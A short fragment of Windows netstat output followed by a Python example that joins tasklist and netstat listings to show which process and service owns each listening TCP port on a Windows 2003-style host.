TCP 192.168.0.3:82 112.32.5.107:31515 ESTABLISHED 4
TCP 192.168.0.3:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 416
UDP 0.0.0.0:1333 *:* 728
UDP 0.0.0.0:4500 *:* 416
UDP 127.0.0.1:123 *:* 756
UDP 192.168.0.3:123 *:* 756
UDP 192.168.0.3:137 *:* 4
UDP 192.168.0.3:138 *:* 4
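As an added example (not part of the write-up), a small parser that joins the tasklist -svc and netstat -ano listings above so that each listening TCP port is attributed to its image and Windows service, which is the exposure review an operator would run on this host to see that TermService (3389) and MySQL (3306) are reachable from the network. The sample listings are constructed to mirror the page's, including the Chinese-locale header and the "暂缺" (N/A) marker; the port-to-PID join follows the same step the write-up performs by hand.

```python
import re

# Added example (not the write-up's code): attribute every listening TCP port to the
# image and service that owns it by joining 'tasklist -svc' with 'netstat -ano'.
NO_SERVICE = {"暂缺", "N/A"}          # Chinese-locale and English 'no service' markers
ROW_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svcs>\S.*)$")

def parse_tasklist_svc(text):
    # PID -> (image, [services]); indented lines continue the previous row's list
    procs, current, started = {}, None, False
    for line in text.splitlines():
        if not started:                        # skip everything up to the '====' rule
            started = line.startswith("=")
            continue
        if line[:1].isspace() and current is not None:
            procs[current][1].extend(s.strip() for s in line.split(",") if s.strip())
            continue
        m = ROW_RE.match(line)
        if not m:
            continue
        raw = m["svcs"].strip()
        svcs = [] if raw in NO_SERVICE else [s.strip() for s in raw.split(",") if s.strip()]
        current = int(m["pid"])
        procs[current] = (m["image"], svcs)
    return procs

def parse_listening_tcp(text):
    # local TCP port -> owning PID, LISTENING sockets only (UDP and ESTABLISHED skipped)
    ports = {}
    for fields in (line.split() for line in text.splitlines()):
        if len(fields) == 5 and fields[0] == "TCP" and fields[3] == "LISTENING":
            ports[int(fields[1].rsplit(":", 1)[1])] = int(fields[4])
    return ports

def exposed_services(tasklist_text, netstat_text):
    # [(port, image, [services])] sorted by port; unknown PIDs are labelled, not dropped
    procs = parse_tasklist_svc(tasklist_text)
    return [(port, *procs.get(pid, ("<unknown pid %d>" % pid, [])))
            for port, pid in sorted(parse_listening_tcp(netstat_text).items())]

# Constructed listings mirroring the write-up's Win2003 host (not copied output).
TASKLIST_SAMPLE = """\
映像名称                       PID 服务
========================= ======== ============================================
System Idle Process              0 暂缺
lsass.exe                      416 HTTPFilter, PolicyAgent, ProtectedStorage,
                                   SamSs
httpd.exe                     1112 Apache2a
mysqld.exe                    1256 MySQLa
svchost.exe                   2444 TermService
"""
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1112
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       416
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1256
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       2444
  UDP    0.0.0.0:445            *:*                                    4
"""
```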